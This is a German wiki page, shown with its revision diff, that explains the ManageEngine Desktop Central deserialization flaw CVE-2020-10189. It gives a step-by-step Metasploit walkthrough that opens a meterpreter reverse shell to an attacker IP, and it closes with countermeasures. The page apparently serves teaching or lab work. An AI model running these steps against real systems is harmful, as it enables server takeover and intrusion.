Manager Central Schwachstelle: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „== Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189) == '''Schwachstelle''': Die Schwachstelle in ManageEngine Desktop Central (z. B. C…“)
 
Zeile 1: Zeile 1:
== Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189) ==
+
== Details zur Schwachstelle: ManageEngine Desktop Central Java Deserialization (CVE-2020-10189) ==
  
'''Schwachstelle''': Die Schwachstelle in ManageEngine Desktop Central (z. B. CVE-2020-10189) ermöglicht eine Remote Code Execution (RCE) durch unsichere Deserialisierung von Daten in ungepatchten Versionen. Dies ermöglicht es einem Angreifer, beliebigen Code auf dem Server auszuführen.
+
'''Schwachstelle''': Unsichere Java-Deserialisierung in ManageEngine Desktop Central ermöglicht einem Angreifer Remote Code Execution (RCE). Diese Schwachstelle erlaubt es, speziell gestaltete Java-Objekte zu senden, die deserialisiert und ausgeführt werden, was zur Ausführung beliebigen Codes führt.
  
'''Angriffspunkt''': Die Schwachstelle befindet sich in der Verwaltungsschnittstelle von Desktop Central, die standardmäßig auf einem Webserver läuft. Angreifer können speziell gestaltete HTTP-Anfragen an den Server senden, um unsichere Deserialisierung auszulösen und bösartigen Code auszuführen.
+
'''Angriffspunkt''': Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, die unsichere Java-Deserialisierung auslösen.
  
'''Ausnutzung''': Ein Angreifer kann ein speziell entwickeltes Exploit-Tool (z. B. Metasploit-Modul) verwenden, um die Schwachstelle auszunutzen und eine Remoteshell zu erhalten. Der Exploit nutzt unsichere Deserialisierungspraktiken im Servercode aus, um die Kontrolle zu erlangen.
+
'''Ausnutzung''': Ein Angreifer kann ein speziell entwickeltes Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.
  
 
=== Schritte zur Ausnutzung ===
 
=== Schritte zur Ausnutzung ===
  
# Überprüfe die Version von ManageEngine Desktop Central, um festzustellen, ob sie anfällig ist.
+
# Starte die Metasploit-Konsole:
# Verwende Metasploit, um den passenden Exploit zu finden, der die Schwachstelle ausnutzt.
+
  msfconsole
# Konfiguriere den Exploit mit der Ziel-IP-Adresse (RHOSTS), deiner IP-Adresse (LHOST), und setze den Payload (z. B. `java/meterpreter/reverse_tcp`).
 
# Starte den Exploit. Wenn der Exploit erfolgreich ist, erhält der Angreifer eine Meterpreter-Sitzung und damit vollen Zugriff auf das System.
 
  
=== Warum ist diese Schwachstelle gefährlich? ===
+
# Wähle das Exploit-Modul für die Java-Deserialisierung:
 +
  use exploit/windows/http/desktopcentral_deserialization
 +
 
 +
# Setze die Optionen für das Zielsystem und die Payload:
 +
  set RHOSTS 10.0.10.107  # Ziel-IP-Adresse 
 +
  set RPORT 8022          # Ziel-Port 
 +
  set LHOST 10.0.10.101    # Angreifer-IP-Adresse für die Reverse-Shell 
 +
  set LPORT 4444          # Lokaler Port für die Verbindung 
 +
  set PAYLOAD windows/meterpreter/reverse_tcp  # Payload-Typ 
 +
 
 +
# Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
 +
  show options
 +
 
 +
# Führe den Exploit aus:
 +
  exploit
  
* '''Remote Code Execution (RCE)''': Ermöglicht es einem Angreifer, beliebige Befehle auf dem Server auszuführen, was zur vollständigen Kompromittierung des Systems führen kann.
+
# Überprüfe die Verbindung:
* '''Ungepatchte Systeme''': Viele Organisationen haben es möglicherweise versäumt, ihre Systeme zu aktualisieren, was sie anfällig macht.
+
Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.
* '''Weitreichende Auswirkungen''': Ein erfolgreicher Angriff kann nicht nur das kompromittierte System gefährden, sondern auch dazu verwendet werden, sich lateral im Netzwerk zu bewegen und andere Systeme zu infizieren.
 
* '''Einfacher Zugang''': Wenn der Webserver öffentlich zugänglich ist und keine Sicherheitsmaßnahmen wie Firewalls oder zusätzliche Authentifizierungen vorhanden sind, kann der Angriff sehr einfach durchgeführt werden.
 
  
=== Beispiel für Metasploit-Konfiguration ===
+
=== Warum ist diese Schwachstelle gefährlich? ===
  
Um die Schwachstelle auszunutzen, kann folgendes Metasploit-Modul verwendet werden:
+
* '''Remote Code Execution (RCE)''': Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
 +
* '''Weitreichende Auswirkungen''': Volle Kompromittierung des Servers und möglicherweise weitere Netzwerkinfektion.
 +
* '''Angriff auf ungeschützte Versionen''': Ungepatchte Versionen von ManageEngine Desktop Central sind gefährdet.
  
<code>
+
=== Gegenmaßnahmen ===
msf6 > use exploit/windows/http/manageengine_dc_pmp_sqli_rce
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set RHOSTS 10.0.10.107
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set RPORT 8022
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set LHOST <deine_IP>
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set LPORT 4444
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > run
 
</code>
 
  
Nach erfolgreichem Exploit erhält der Angreifer eine Meterpreter-Sitzung und kann weitergehende Post-Exploitation-Schritte durchführen, wie das Sammeln von Anmeldeinformationen, Dateisystemmanipulationen und das Einrichten von Persistenz.
+
* Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
 +
* Verwende Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS), um bösartige Anfragen zu blockieren.
 +
* Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.

Version vom 28. August 2024, 16:09 Uhr

Details zur Schwachstelle: ManageEngine Desktop Central Java Deserialization (CVE-2020-10189)

Schwachstelle: Unsichere Java-Deserialisierung in ManageEngine Desktop Central ermöglicht einem Angreifer Remote Code Execution (RCE). Diese Schwachstelle erlaubt es, speziell gestaltete Java-Objekte zu senden, die deserialisiert und ausgeführt werden, was zur Ausführung beliebigen Codes führt.

Angriffspunkt: Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, die unsichere Java-Deserialisierung auslösen.

Ausnutzung: Ein Angreifer kann ein speziell entwickeltes Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.

Schritte zur Ausnutzung

  1. Starte die Metasploit-Konsole:
 msfconsole
  1. Wähle das Exploit-Modul für die Java-Deserialisierung:
 use exploit/windows/http/desktopcentral_deserialization
  1. Setze die Optionen für das Zielsystem und die Payload:
 set RHOSTS 10.0.10.107   # Ziel-IP-Adresse  
 set RPORT 8022           # Ziel-Port  
 set LHOST 10.0.10.101    # Angreifer-IP-Adresse für die Reverse-Shell  
 set LPORT 4444           # Lokaler Port für die Verbindung  
 set PAYLOAD windows/meterpreter/reverse_tcp  # Payload-Typ  
  1. Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
 show options
  1. Führe den Exploit aus:
 exploit
  1. Überprüfe die Verbindung:

Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.

Warum ist diese Schwachstelle gefährlich?

  • Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
  • Weitreichende Auswirkungen: Volle Kompromittierung des Servers und möglicherweise weitere Netzwerkinfektion.
  • Angriff auf ungeschützte Versionen: Ungepatchte Versionen von ManageEngine Desktop Central sind gefährdet.

Gegenmaßnahmen

  • Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
  • Verwende Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS), um bösartige Anfragen zu blockieren.
  • Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.